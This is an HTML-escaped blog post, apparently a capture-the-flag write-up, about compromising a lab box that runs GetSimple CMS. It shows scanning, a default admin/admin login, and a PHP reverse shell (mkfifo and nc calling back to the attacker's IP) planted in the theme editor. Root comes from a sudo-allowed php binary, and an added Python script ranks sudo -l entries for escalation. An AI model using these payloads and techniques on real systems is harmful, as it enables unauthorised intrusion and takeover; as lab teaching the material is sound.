&lt;p&gt;Next I ran a full port scan (all 65,535 TCP ports) with version detection and the default NSE scripts, which try to obtain more detailed info. You get all this just by running &lt;code&gt;nmap -sV -sC -p- &amp;lt;TARGET_IP&amp;gt;&lt;/code&gt;. &lt;/p&gt;

&lt;p&gt;While &lt;code&gt;nmap&lt;/code&gt; is running (the full scan takes some time) I open the target IP in a browser. I see that GetSimple CMS is running there. Immediately I google GetSimple CMS vulnerabilities. Of course there is a high-severity one: Remote Code Execution. &lt;/p&gt;

&lt;p&gt;I continue with &lt;code&gt;Gobuster&lt;/code&gt;, which brute-forces directory names from a wordlist and shows me what folders exist on the server: &lt;code&gt;gobuster dir -u &amp;lt;TARGET_IP&amp;gt; -w ./wordlists/common.txt&lt;/code&gt; &lt;/p&gt;

&lt;p&gt;Well, &lt;code&gt;Gobuster&lt;/code&gt; showed me that there are some folders, the most interesting of them being the &lt;code&gt;/admin&lt;/code&gt; folder (I should have checked this even before I ran gobuster). So, I go to &lt;code&gt;&amp;lt;TARGET_IP&amp;gt;/admin&lt;/code&gt; and I get a login screen. Now, you don't need to be a hacker to enter admin/admin when you see a login screen somewhere. &lt;/p&gt;

&lt;p&gt;And interestingly enough, one of the instructors in the cybersecurity training in my company told me that one of the boxes on the (in)famous &lt;a href="https://www.offsec.com/courses/pen-200/" rel="noopener noreferrer"&gt;OSCP certification&lt;/a&gt; exam had this vulnerability. So, believe it or not, I got into the admin panel using admin/admin credentials. We still don't have access to the server, but we are awfully close.&lt;/p&gt;

&lt;h2&gt;
  
  
  Act II: The Walls Have Been Breached
&lt;/h2&gt;

&lt;p&gt;Now I get back to the vulnerability that I googled. I see it's for version &lt;code&gt;3.3.16&lt;/code&gt; and I check which one we have: it's &lt;code&gt;3.3.15&lt;/code&gt;, so hopefully we are good. I guess I could run Metasploit here and get into the box using this vulnerability, but that feels like cheating. &lt;/p&gt;

&lt;p&gt;At first look the vulnerability is not straightforward, so I get back to see what we have in the admin panel. There is an edit-theme page which lets you include PHP files. I check where those files are loaded from. I go through the &lt;code&gt;/backup&lt;/code&gt; and &lt;code&gt;/data&lt;/code&gt; folders that &lt;code&gt;Gobuster&lt;/code&gt; found, and see some things that would help me get the username and password of the admin, which I had already guessed. There is an API key which may come in useful. (Later I found out that this would have been used for authentication through Metasploit if I hadn't gotten access to the admin portal.)  &lt;/p&gt;

&lt;p&gt;By this time the full &lt;code&gt;nmap&lt;/code&gt; scan has finished; I see that the server uses &lt;code&gt;OpenSSH 8.2p1&lt;/code&gt;, which has some vulnerabilities. But GetSimple CMS is the elephant in the room here.&lt;/p&gt;

&lt;p&gt;I look around the admin panel; there is an upload-file button, but it's not working. I google the issue: it's not working because Flash is not enabled. I get back to the edit-theme page and start to fiddle with it. I realize immediately that I was overthinking it and that I can just write PHP code here directly. Now it's easy-peasy. At the end of the file, I just write:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&amp;gt;&amp;amp;1|nc &amp;lt;MY_IP&amp;gt; 9443 &amp;gt;/tmp/f");?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and, voilà, I have a reverse shell. Of course, before triggering it I need &lt;code&gt;netcat&lt;/code&gt; listening on my VM for the connection that will be opened: &lt;code&gt;nc -lvnp 9443&lt;/code&gt;. Then I &lt;code&gt;curl&lt;/code&gt; or just open the page that has the reverse shell code in it, and the box connects back to me. &lt;/p&gt;

&lt;p&gt;We are in! But for our victory to be complete, we need root access. Next step: Privilege escalation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Act III: All Your Base Are Belong To Us
&lt;/h2&gt;

&lt;p&gt;Let's first upgrade the shell a bit, because in its current state it doesn't have all the nice features we are used to (no proper TTY, so no tab completion or job control, and Ctrl-C kills the whole session). There are &lt;a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/" rel="noopener noreferrer"&gt;multiple ways&lt;/a&gt; to do this, but I did it this way: &lt;br&gt;
&lt;code&gt;python3 -c 'import pty; pty.spawn("/bin/bash")'&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now I have a full-blown shell and I browse around the file system to see if there is anything interesting that can be used for privilege escalation. I also find the first flag. &lt;/p&gt;

&lt;p&gt;I'm thinking of running &lt;code&gt;LinPEAS&lt;/code&gt;, but let's first see what sudo privileges I have: &lt;code&gt;sudo -l -U &amp;lt;username&amp;gt;&lt;/code&gt;. Bingo! I see: &lt;br&gt;
&lt;code&gt;(ALL : ALL) NOPASSWD: /usr/bin/php&lt;/code&gt;, which means I can run the PHP binary as root (as any user and group, in fact) without a password. And you know what that means... &lt;/p&gt;
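&lt;p&gt;The &lt;code&gt;sudo -l&lt;/code&gt; check above is the quickest privilege-escalation win, so here is an added example of how to triage its output in general (my own illustration, not code from the post or from HackTheBox). It parses the user-specification section, flags NOPASSWD entries, and marks binaries that can hand you a shell when run as root, which is exactly the PHP situation on this box. The sample output, the &lt;code&gt;www-data&lt;/code&gt; user, the hostname &lt;code&gt;box&lt;/code&gt; and the extra systemctl and vim entries are constructed for the example, and the &lt;code&gt;SHELL_CAPABLE&lt;/code&gt; set is only a small illustrative subset: GTFOBins is the full reference to consult.&lt;/p&gt;

```python
"""Triage `sudo -l` output for privilege-escalation candidates (added example).

Parses the "may run the following commands" section, flags NOPASSWD entries
and marks binaries that hand you a shell when run as root, which is the
/usr/bin/php situation from the box above. SHELL_CAPABLE is an illustrative
subset only; GTFOBins is the full reference.
"""
import re
from dataclasses import dataclass

# Constructed sudo -l output modelled on the post's finding; not real data.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for www-data on box:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on box:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: /usr/bin/vim
"""

# Basenames that spawn a shell or read/write arbitrary files when run as root.
# Assumption: a small subset; extend it from GTFOBins for real engagements.
SHELL_CAPABLE = {
    "php", "python", "python2", "python3", "perl", "ruby", "node",
    "vim", "vi", "nano", "less", "more", "find", "awk", "bash", "sh", "env",
}

# Groups: 1 run-as spec, 2 tag list such as "NOPASSWD: ", 3 command spec(s).
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


@dataclass
class SudoEntry:
    runas: str            # "ALL : ALL", "root", ...
    nopasswd: bool        # NOPASSWD tag present
    command: str          # command spec exactly as listed
    binary: str           # basename of the first token, or "ALL"
    shell_capable: bool   # binary is in SHELL_CAPABLE, or the spec is ALL

    @property
    def severity(self):
        # Shell-capable without a password is a straight path to root. With a
        # password it still needs the user's secret, which a web shell
        # usually does not have.
        if self.shell_capable and self.nopasswd:
            return "critical"
        if self.shell_capable:
            return "high"
        return "info"


def parse_sudo_l(text):
    """Return a SudoEntry per command spec in the user-specification section."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if m is None:
            continue
        tags = {t.strip().upper() for t in m.group(2).split(":") if t.strip()}
        # sudo lists several command specs on one line separated by commas.
        for spec in (s.strip() for s in m.group(3).split(",")):
            if not spec:
                continue
            first = spec.split()[0]
            binary = "ALL" if first == "ALL" else first.rsplit("/", 1)[-1]
            entries.append(SudoEntry(
                runas=m.group(1).strip(),
                nopasswd="NOPASSWD" in tags,
                command=spec,
                binary=binary,
                shell_capable=(binary == "ALL" or binary in SHELL_CAPABLE),
            ))
    return entries


def escalation_candidates(text):
    """Entries worth trying first, most severe first (ties broken by command)."""
    rank = {"critical": 0, "high": 1, "info": 2}
    return sorted(parse_sudo_l(text), key=lambda e: (rank[e.severity], e.command))


if __name__ == "__main__":
    for e in escalation_candidates(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if e.nopasswd else "password"
        print(f"[{e.severity:8}] ({e.runas}) {tag}: {e.command}")
```

&lt;p&gt;On a real box you would save the output of &lt;code&gt;sudo -l&lt;/code&gt; to a file and pass its contents to &lt;code&gt;escalation_candidates()&lt;/code&gt;; the entries rated critical are the ones to try first. The systemctl entry in the sample is rated info for a reason: it needs the user's password, which you rarely have when you arrived through a web shell, and it does not obviously give you a shell even if you had it.&lt;/p&gt;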

&lt;p&gt;I go and have a quick chat with ChatGPT. Essentially you have numerous options here, but I go with the interactive shell, because why not take everything life gives you.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo /usr/bin/php -a

php &amp;gt; chdir('/root');

chdir('/root');

php &amp;gt; print_r(scandir('.'));

print_r(scandir('.'));

Array
(
[0] =&amp;gt; .
[1] =&amp;gt; ..
[2] =&amp;gt; .bash_history
[3] =&amp;gt; .bashrc
[4] =&amp;gt; .local
[5] =&amp;gt; .php_history
[6] =&amp;gt; .profile
[7] =&amp;gt; .viminfo
[8] =&amp;gt; root.txt
[9] =&amp;gt; snap
)

php &amp;gt; echo file_get_contents('root.txt');
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Essentially, I now have a root shell, and from here the sky is the limit. &lt;/p&gt;

&lt;p&gt;The whole process was, as I said, super thrilling. It is an interesting mixture of the thrill of doing something bad and the fulfillment of doing something good. But more on that some other time. &lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>pentesting</category>
    </item>
  </channel>
</rss>
